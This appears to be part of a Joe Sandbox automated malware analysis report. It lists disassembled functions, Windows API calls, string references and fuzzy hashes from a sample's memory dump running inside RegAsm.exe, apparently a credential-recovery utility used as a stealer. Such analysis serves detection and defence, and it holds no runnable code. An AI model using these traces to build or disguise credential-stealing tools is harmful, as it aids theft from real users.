                                                                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                              • strchr.MSVCRT ref: 0040C140
                                                                                                                                              • strchr.MSVCRT ref: 0040C151
                                                                                                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                              • memset.MSVCRT ref: 0040C17A
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                              • String ID: 4$h
                                                                                                                                              • API String ID: 4019544885-1856150674
                                                                                                                                              • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                              • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                              • String ID: 0$6
                                                                                                                                              • API String ID: 4066108131-3849865405
                                                                                                                                              • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                              • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004082EF
                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                              • memset.MSVCRT ref: 00408362
                                                                                                                                              • memset.MSVCRT ref: 00408377
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$ByteCharMultiWide
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 290601579-0
                                                                                                                                              • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                              • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                              APIs
                                                                                                                                              • memchr.MSVCRT ref: 00444EBF
                                                                                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                              • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                              • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                              • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                              • memset.MSVCRT ref: 0044505E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memchrmemset
                                                                                                                                              • String ID: PD$PD
                                                                                                                                              • API String ID: 1581201632-2312785699
                                                                                                                                              • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                              • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                              APIs
                                                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                              • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2163313125-0
                                                                                                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$wcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3592753638-3916222277
                                                                                                                                              • Opcode ID: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                              • Opcode Fuzzy Hash: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040A47B
                                                                                                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                              • String ID: %s (%s)$YV@
                                                                                                                                              • API String ID: 3979103747-598926743
                                                                                                                                              • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                              • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                                                                              • API String ID: 2767993716-572158859
                                                                                                                                              • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                              • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                              • API String ID: 3176057301-2039793938
                                                                                                                                              • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                              • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • database is already attached, xrefs: 0042F721
                                                                                                                                              • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                              • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                              • out of memory, xrefs: 0042F865
                                                                                                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpymemset
                                                                                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                              • API String ID: 1297977491-2001300268
                                                                                                                                              • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                              • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                              • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                              • String ID: ($d
                                                                                                                                              • API String ID: 1140211610-1915259565
                                                                                                                                              • Opcode ID: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                                                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                              • Opcode Fuzzy Hash: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                                                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                              APIs
                                                                                                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3015003838-0
                                                                                                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00407E44
                                                                                                                                              • memset.MSVCRT ref: 00407E5B
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                              • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 59245283-0
                                                                                                                                              • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                              • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                              • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                              • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy
                                                                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                              • API String ID: 3510742995-3273207271
                                                                                                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                              APIs
                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                              • memset.MSVCRT ref: 00413ADC
                                                                                                                                              • memset.MSVCRT ref: 00413AEC
                                                                                                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                              • memset.MSVCRT ref: 00413BD7
                                                                                                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                              • String ID: 3A
                                                                                                                                              • API String ID: 3300951397-293699754
                                                                                                                                              • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                              • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                              • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                              • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                              • String ID: strings
                                                                                                                                              • API String ID: 3166385802-3030018805
                                                                                                                                              • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                              • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00411AF6
                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                              • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                              • String ID: AE$.cfg$General$EA
                                                                                                                                              • API String ID: 776488737-1622828088
                                                                                                                                              • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                              • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040D8BD
                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                              • memset.MSVCRT ref: 0040D906
                                                                                                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                              • String ID: sysdatetimepick32
